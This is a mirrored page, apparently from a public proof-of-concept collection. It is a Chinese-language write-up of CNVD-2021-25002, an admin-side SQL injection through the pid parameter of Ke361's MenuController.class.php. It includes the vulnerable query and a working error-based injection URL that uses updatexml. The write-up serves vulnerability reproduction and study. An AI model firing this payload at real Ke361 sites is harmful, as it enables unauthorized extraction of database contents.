mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-05 10:50:23 +00:00
35 lines
822 B
Markdown
35 lines
822 B
Markdown
|
|
# Ke361 MenuController.class.php 后台SQL注入漏洞 CNVD-2021-25002
|
|||
|
|
|
|||
|
|
## 漏洞描述
|
|||
|
|
|
|||
|
|
Ke361 MenuController.class.php文件 index() 函数中的pid参数存在 SQL注入漏,导致攻击者通过漏洞可以获取数据库敏感信息
|
|||
|
|
|
|||
|
|
## 漏洞影响
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
Ke361
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 环境搭建
|
|||
|
|
|
|||
|
|
https://gitee.com/jcove/ke361
|
|||
|
|
|
|||
|
|
## 漏洞复现
|
|||
|
|
|
|||
|
|
存在漏洞的文件为 `Application/Admin/Controller/MenuController.class.php`
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
Get 传参 pid 传入SQL语句
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
SELECT `id`,`title`,`pid`,`sort`,`url`,`hide`,`tip`,`group`,`is_dev`,`status` FROM `ke_menu` WHERE (id=1)
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
使用括号闭合语句,构造SQL注入
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
/admin.php?s=/Menu/index/pid/1)%20AND%20updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--+
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|